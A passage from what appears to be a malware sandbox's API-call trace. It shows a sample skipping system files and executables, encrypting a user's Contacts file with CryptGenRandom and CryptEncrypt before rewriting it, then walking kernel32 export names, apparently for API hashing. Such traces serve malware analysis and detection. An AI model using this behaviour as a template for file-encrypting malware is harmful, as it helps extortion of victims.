(lpString1="Administrator.contact", lpString2="iconcache.db") returned -1 [0082.691] lstrcmpiW (lpString1="Administrator.contact", lpString2="bootsect.bak") returned -1 [0082.691] lstrcmpiW (lpString1="Administrator.contact", lpString2="ntuser.dat.log") returned -1 [0082.691] lstrcmpiW (lpString1="Administrator.contact", lpString2="thumbs.db") returned -1 [0082.691] lstrcmpiW (lpString1="Administrator.contact", lpString2="Bootfont.bin") returned -1 [0082.691] lstrlenW (lpString="Administrator.contact") returned 21 [0082.691] lstrcmpiW (lpString1="contact", lpString2="lnk") returned -1 [0082.691] lstrcmpiW (lpString1="contact", lpString2="exe") returned -1 [0082.691] lstrcmpiW (lpString1="contact", lpString2="sys") returned -1 [0082.691] lstrcmpiW (lpString1="contact", lpString2="dll") returned -1 [0082.692] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0082.692] lstrlenW (lpString="Administrator.contact") returned 21 [0082.692] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0082.692] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="Administrator.contact" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" [0082.692] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.692] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0082.692] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=68382) returned 1 [0082.692] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0082.692] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0082.693] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.693] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.693] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.695] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0082.695] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0082.697] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.698] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0082.699] CloseHandle (hObject=0x43c) returned 1 [0082.699] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.699] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0082.700] CloseHandle (hObject=0x0) returned 0 [0082.700] CloseHandle (hObject=0x438) returned 1 [0082.700] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.700] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.700] GetTickCount () returned 0x114d25d [0082.700] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.701] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.701] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.701] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.701] lstrlenA (lpString="kernel32.dll") returned 12 [0082.701] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.701] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.701] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.701] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.701] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.701] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.701] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.701] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.701] lstrlenA (lpString="ADDATOMA") returned 8 [0082.701] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.701] lstrlenA (lpString="ADDATOMW") returned 8 [0082.701] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.702] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.702] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.702] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.702] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.702] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.702] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.702] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.702] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.702] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.702] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.702] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.702] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.702] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.702] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.702] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.702] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.702] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.702] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.703] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.703] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.703] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.703] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.703] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.703] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.703] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.703] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.703] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.703] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.703] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.703] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.703] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.703] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.703] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.703] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.703] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.703] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.704] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.704] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.704] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.704] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.704] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.704] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.704] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.704] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.704] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.704] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.704] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.704] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.704] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.704] lstrlenA (lpString="BEEP") returned 4 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.704] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.704] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.704] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.704] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.705] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.705] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.705] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.705] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.705] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.705] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.705] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.705] lstrlenA (lpString="CANCELIO") returned 8 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.705] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.705] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.705] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.705] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.705] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.705] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.705] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.705] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.705] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.706] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.706] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.706] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.706] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.706] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.706] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.706] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.706] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.706] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.706] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.706] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.706] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.706] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.706] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.706] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.706] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.706] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.706] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.706] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.707] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.707] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.707] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.707] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.707] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.707] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") 